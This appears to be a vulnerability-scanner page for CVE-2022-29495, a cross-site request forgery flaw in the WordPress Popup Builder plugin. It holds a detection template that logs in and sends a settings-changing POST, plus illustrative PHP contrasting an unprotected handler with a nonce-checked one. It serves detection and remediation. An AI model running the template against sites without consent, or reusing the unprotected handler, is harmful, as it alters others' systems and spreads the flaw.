
WordPress Popup Builder <= 4.1.11 - Cross-Site Request Forgery

CVE-2022-29495
Verified

Description

The Sygnoos Popup Builder plugin for WordPress, in versions 4.1.11 and earlier, does not protect its settings-update handler against cross-site request forgery. An attacker who lures a logged-in administrator to a malicious page or link can have the victim's browser submit a forged request that changes the plugin's settings without the administrator's consent.

Severity

Medium

Published Date

February 6, 2026

Template Author

Shivam Kamboj

CVE-2022-29495.yaml
id: CVE-2022-29495

info:
  name: WordPress Popup Builder <= 4.1.11 - Cross-Site Request Forgery
  author: Shivam Kamboj
  severity: medium
  description: |
    The Sygnoos Popup Builder plugin for WordPress, in versions 4.1.11 and earlier, does not protect its settings-update handler against cross-site request forgery. An attacker who lures a logged-in administrator to a malicious page or link can have the victim's browser submit a forged request that changes the plugin's settings without the administrator's consent.
  impact: |
    Attackers can modify plugin settings without authorization, potentially leading to site defacement or malicious content injection.
  remediation: |
    Update to a Popup Builder release later than 4.1.11. In the plugin, protect the settings-update handler with a per-user CSRF token (a WordPress nonce checked server-side) and a capability check before any option is written.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2022-29495
    - https://patchstack.com/database/vulnerability/popup-builder/wordpress-popup-builder-plugin-4-1-11-cross-site-request-forgery-csrf-leading-to-plugin-settings-update
  metadata:
    verified: true
    max-request: 2
    publicwww-query: "plugins/popup-builder"
  tags: cve,cve2022,wordpress,wp-plugin,popup-builder,csrf,authenticated,wp

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 302'
          - 'contains(header, "wordpress_logged_in")'
        condition: and
        internal: true

  - raw:
      - |
        POST /wp-admin/admin-post.php?action=sgpbSaveSettings HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        sgpb-enable-debug-mode=on&sgpb-dont-delete-data=on&sgpb-disable-analytics-general=on

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 302'
          - 'contains(header, "page=sgpbSettings") && contains(header, "post_type=popupbuilder")'
        condition: and

    extractors:
      - type: regex
        part: header
        regex:
          - "Location: (.+)"
        group: 1
# digest: 4b0a00483046022100a2416e5e88d19ff6761f558c2a2efc6e3fc13244e065d3fc8d9782aa5c6808ac022100d6bddfa1e68c1a7ce971f65743dacd96f891a3530f4c76b7e3e1e488b651980d:922c64590222798bb761d5b6d8e72950
CVSS Score: 5.0 (Medium)

CVSS Metrics

References

https://nvd.nist.gov/vuln/detail/CVE-2022-29495
https://patchstack.com/database/vulnerability/popup-builder/wordpress-popup-builder-plugin-4-1-11-cross-site-request-forgery-csrf-leading-to-plugin-settings-update

Remediation Steps

Update to a Popup Builder release later than 4.1.11. In the plugin, protect the settings-update handler with a per-user CSRF token (a WordPress nonce checked server-side) and a capability check before any option is written.
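The following PHP is an added illustration written for this page; it is not Popup Builder's own code and was not taken from the plugin or the template above. It shows the pattern the description and the remediation refer to: a WordPress admin-post.php handler that writes plugin options with no CSRF protection, next to the same handler hardened with a nonce and a capability check. The hook and option names (sgpbSaveSettings, sgpb_settings), the nonce action and field name (sgpb_save_settings, sgpb_nonce) and the settings keys are assumptions chosen to match the request in the template; the WordPress functions used (add_action, check_admin_referer, wp_nonce_field, current_user_can, update_option, wp_safe_redirect, wp_die) are real core API.

```php
<?php
/*
 * Added example, not the plugin's code. Hook, option and nonce names are
 * assumed for illustration. Requires WordPress core to be loaded.
 */

/* ---------- Vulnerable pattern ---------------------------------------- */
/*
 * admin-post.php dispatches POST /wp-admin/admin-post.php?action=sgpbSaveSettings
 * to the 'admin_post_sgpbSaveSettings' hook for any logged-in user. Nothing
 * here proves the request came from a form the user actually submitted, so
 * a hidden form on an attacker's page, auto-submitted in the victim's
 * browser with the victim's cookies, is accepted just like the real one.
 * (Shown unhooked; the vulnerable version would have been registered with
 * add_action( 'admin_post_sgpbSaveSettings', 'sgpb_save_settings_vulnerable' ).)
 */
function sgpb_save_settings_vulnerable() {
    $settings = array(
        'debug_mode'        => isset( $_POST['sgpb-enable-debug-mode'] ),
        'dont_delete_data'  => isset( $_POST['sgpb-dont-delete-data'] ),
        'disable_analytics' => isset( $_POST['sgpb-disable-analytics-general'] ),
    );
    update_option( 'sgpb_settings', $settings ); // assumed option name
    wp_safe_redirect( admin_url( 'edit.php?post_type=popupbuilder&page=sgpbSettings' ) );
    exit;
}

/* ---------- Hardened pattern ------------------------------------------ */
/*
 * The settings form must carry a nonce bound to the current user's session.
 * In the form-rendering code this is emitted as a hidden field:
 *
 *     wp_nonce_field( 'sgpb_save_settings', 'sgpb_nonce' );
 *
 * A cross-site page cannot read that value (same-origin policy), so a forged
 * POST arrives without it and is rejected before any option is written.
 */
add_action( 'admin_post_sgpbSaveSettings', 'sgpb_save_settings_hardened' );
function sgpb_save_settings_hardened() {
    /* Authorization first: a nonce only proves intent, not privilege.
     * Settings changes should be limited to users who may manage options. */
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', 'Forbidden', array( 'response' => 403 ) );
    }

    /* CSRF check: check_admin_referer() verifies the nonce in $_POST['sgpb_nonce']
     * against the action 'sgpb_save_settings' for the current user and, on
     * failure, stops execution with a 403 "link has expired" page. */
    check_admin_referer( 'sgpb_save_settings', 'sgpb_nonce' );

    /* Only reached with a valid nonce and sufficient capability. Checkbox
     * inputs are reduced to booleans so no raw request data is stored. */
    $settings = array(
        'debug_mode'        => isset( $_POST['sgpb-enable-debug-mode'] ),
        'dont_delete_data'  => isset( $_POST['sgpb-dont-delete-data'] ),
        'disable_analytics' => isset( $_POST['sgpb-disable-analytics-general'] ),
    );
    update_option( 'sgpb_settings', $settings ); // assumed option name
    wp_safe_redirect( admin_url( 'edit.php?post_type=popupbuilder&page=sgpbSettings' ) );
    exit;
}
```

With the hardened handler in place, the template's second request (a POST to admin-post.php carrying only the three checkbox fields and the session cookie) no longer produces the 302 to page=sgpbSettings that the matcher looks for; it is stopped at check_admin_referer() with a 403. Note also that when run against a live site, the template's second request does change those three settings on the target, so it should be used only with the owner's consent.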